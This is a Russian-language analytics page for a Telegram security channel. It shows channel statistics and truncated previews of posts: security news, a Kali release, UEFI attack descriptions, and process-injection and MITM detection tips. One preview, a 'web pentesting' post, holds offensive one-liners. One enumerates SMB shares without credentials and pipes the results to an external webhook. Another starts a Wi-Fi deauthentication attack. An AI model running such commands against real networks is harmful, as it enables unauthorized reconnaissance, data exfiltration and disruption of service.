ККИБЕРБАСТИОН

КИБЕРБАСТИОН

@cyber_bastion💻 Технологии🇷🇺 Русский📅 март 2026 г.

Комплексное обеспечение ИБ. Безопасная программная разработка и поддержка. Защищенный ИИ на 360°. Взаимодействие в области ИБ. Рекрутинг. ИТСО. Охрана. Развиваемся и развиваем! ___ Для связи (24/7): ✉️inbox@cyber-bastion.ru ✉️inbox@cyber-bastion.net

📊 Полная статистика📝 Все посты
##036#кибербастион#39#защита#092#pentest#взлом#bugbounty
254
Подписчики
38,7
Ср. охват
15.2%
Вовлечённость
20
Постов
~4.7
В день

Графики

📊 Средний охват постов

📉 ERR % по дням

📋 Публикации по дням

📎 Типы контента

Лучшие публикации

20 из 20
Ccyber_bastion
cyber_bastion
26 мар., 12:59

🧐В Санкт-Петербурге провайдера оштрафовали за обход блокировок Мировой суд Санкт-Петербурга оштрафовал интернет-провайдера «Тинко» на 250 000 рублей за то, что трафик компании шел в обход технических средств противодействия угрозам (ТСПУ), а клиенты могли свободно пользоваться запрещенными платформами. Судья судебного участка № 178 привлекла «Тинко» к ответственности по ч. 1 ст. 13.42.1 КоАП (неисполнение обязанностей по пропуску трафика через ТСПУ). Санкция статьи предусматривает штраф в разме...

👁 156📷 photo
Ccyber_bastion
cyber_bastion
27 мар., 06:59

🧐Штраф за оскорбление в MАХ В России выписали первый штраф за оскорбление в MAX — за то, что чиновник оскорбил своего начальника в рабочем чате. Суд признал сотрудника администрации виновным по статье о публичном оскорблении в интернете и назначил 12 тысяч рублей штрафа #Кибербастион #Штраф #MAX

👁 56📷 photo
Ccyber_bastion
cyber_bastion
26 мар., 16:59

🧐LiteLLM взломали через CI: украли токены и залили малварь в PyPI Популярную библиотеку LiteLLM просто компрометировали и залили вредоносные версии прямо в PyPI. Речь про 1.82.7 и 1.82.8. Если Вы их устанавливали, есть шанс, что все Ваши ключи уже где-то "гуляют". Самое неприятное, что GitHub репозиторий был чистый, атака шла именно через публикацию пакета. Сначала сломали Trivy, тот самый сканер зависимостей из CI. Через него утек токен, который использовался в пайплайне LiteLLM. Дальше всё пр...

👁 41📷 photo
Ccyber_bastion
cyber_bastion
26 мар., 18:59

🧐Антисниффер Антиснифферы - это программные инструменты, предназначенные для обнаружения и предотвращения сниффинга пакетов. Бесплатные и открытые антиснифферы: • Kismet: анализатор беспроводных сетей с возможностями обнаружения сниффинга. • Cain & Abel: набор инструментов для восстановления паролей и анализа сети, который включает в себя модуль обнаружения сниффинга. • Ettercap: инструмент перехвата сетевого трафика с возможностями обнаружения сниффинга. Коммерческие антиснифферы: • NetWitness...

👁 41📷 photo
Ccyber_bastion
cyber_bastion
26 мар., 10:39

🧐3 способа для проведения веб-пентестинга 1. Быстрое перечисление SMB-шар без кредов + отправка результатов на webhook: собирает пользователей, шары и политики, логирует удаленно: crackmapexec smb target.example.com –shares –users –pass-pol | curl -s -X POST https://webhook.site/your-id –data-binary @- 2. Wi-Fi deauth-атака с подтверждением через webhook: отключает клиентов от AP, пинг на webhook подтверждает успех (клиент reconnect’ится и триггерит): airodump-ng wlan0mon # найди BSSID и клиент...

👁 39📷 photo
Ccyber_bastion
cyber_bastion
26 мар., 14:59

🧐Вышел новый дистрибутив Kali Linux 2026.1 Компания Offensive Security выпустила Kali Linux 2026.1 — последнюю стабильную версию дистрибутива GNU/Linux на базе Debian для пентестинга и этичного хакинга. Появились новые инструменты: 1. AdaptixC2 — расширяемая платформа для постэксплуатации и эмуляции атак; 2. Atomic-Operator — инструмент для выполнения тестов Atomic Red Team в различных операционных системах; 3. Fluxion — инструмент для аудита безопасности и исследования социальной инженерии. Кр...

👁 38📷 photo
Ccyber_bastion
cyber_bastion
28 мар., 19:26

🧐Атаки на UEFI UEFI - мини-ОС, которая стартует раньше загрузчика, раньше ядра, раньше любого антивируса. Код, записанный в SPI-флеш материнской платы, живёт независимо от диска. Форматирование, смена накопителя и переустановка системы его не затрагивают. Реальные примеры - CosmicStrand, MoonBounce, BlackLotus - все три пережили полный вайп диска. Атакующий с правами администратора записывает вредоносный DXE-драйвер в NVRAM через уязвимый UEFI-апдейтер, либо патчит загрузчик ОС ещё до её старта...

👁 36📷 photo
Ccyber_bastion
cyber_bastion
27 мар., 08:59

🧐В Steam обнаружили вредоносные игры ФБР пытается установить личности лиц, пострадавших после установки одной из вредоносных игр в Steam с мая 2024 года по январь 2026 года. В рамках расследования бюро выявило несколько вредоносных игр: BlockBlasters, Chemia, Dashverse/DashFPS, Lampy, Lunara, PirateFi и Tokenova. Для передачи информации ФБР предлагает заполнить короткую форму, отвечая на вопросы о криптовалютных транзакциях, скомпрометированных учётных записях и украденных деньгах Анкета запраш...

👁 36📷 photo
Ccyber_bastion
cyber_bastion
27 мар., 12:59

🧐5 лайфхаков для bash 1. Детектим инъекцию в легитимный процесс: for pid in /proc/[0-9]; do maps="$pid/maps"; [[ -f $maps ]] && grep -l "rwxp" $maps 2>/dev/null; done Исполняемые анонимные регионы памяти (rwxp без файла) - частый признак shellcode injection или memfd_create. 2. Ищем процессы без файла на диске: for pid in /proc/[0-9]; do exe=$(readlink $pid/exe 2>/dev/null); [[ $exe == "(deleted)" ]] && cat $pid/cmdline | tr '\0' ' ' && echo; done Малварь...

👁 35📷 photo
Ccyber_bastion
cyber_bastion
27 мар., 14:59

🧐Поиск MITM TCP-пересборка соединения - первый тревожный маркер: tcp.flags.reset == 1 || tcp.flags.syn == 1 Если вы видите лишние сбросы там, где трафик должен быть стабильным, почти всегда это следствие вмешательства. Понижение версии TLS: tls.handshake.version Cipher Suites и расширения как отпечаток посредника: Добавьте в отображение параметры TLS и сравните их между несколькими сессиями к одному и тому же домену. Если поведение «плавает» - сервер, скорее всего, уже не тот. DNS как точка вхо...

👁 35📷 photo

Типы хуков

Нейтральный13 | 44 просм.
Статистика5 | 32 просм.
Вопрос2 | 20 просм.

Длина постов

Очень длинные (1000+)9 | 33 просм.
Длинные (500-1000)7 | 52 просм.
Короткие (<200)2 | 19 просм.
Средние (200-500)2 | 37 просм.

Типы контента

📷
17
photo
42 просм.
📝
3
text
18 просм.
КИБЕРБАСТИОН (@cyber_bastion) — Telegram-канал | PostSniper